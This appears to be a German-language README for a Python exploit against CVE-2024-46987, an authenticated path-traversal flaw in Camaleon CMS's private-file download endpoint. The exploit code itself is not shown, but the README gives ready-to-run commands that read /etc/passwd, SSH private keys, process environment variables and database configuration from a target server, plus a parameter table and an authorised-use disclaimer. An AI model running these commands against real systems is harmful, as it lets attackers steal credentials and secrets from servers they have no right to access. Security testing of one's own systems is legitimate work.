
CVE-2024-46987 - Camaleon CMS LFI Exploit
Exploit für authentifizierte lokale Dateieinbindung (LFI) für Camaleon CMS.
Camaleon CMS ist anfällig für einen authentifizierten LFI-Angriff über den Endpunkt /admin/media/download_private_file. Der Parameter file wird nicht ordnungsgemäß bereinigt, was einen Pfad-Traversal ermöglicht, um beliebige Dateien vom Server zu lesen.
pip install requests
# Print file to terminal (default)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"
# Save to file
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt
# Read passwd file
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"
# Read SSH keys
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa
# Read environment variables
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"
# Read application config
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Verwenden Sie es nur gegen Systeme, für die Sie ausdrückliche Berechtigung zum Testen haben.
| Parameter | Beschreibung |
|---|
-u, --url | Ziel-URL |
-f, --file | Zu lesende Datei (z. B. /etc/passwd) |
-t, --token | auth_token-Cookie-Wert |
-o, --output | Ausgabedateiname (optional, wird sonst im Terminal ausgegeben) |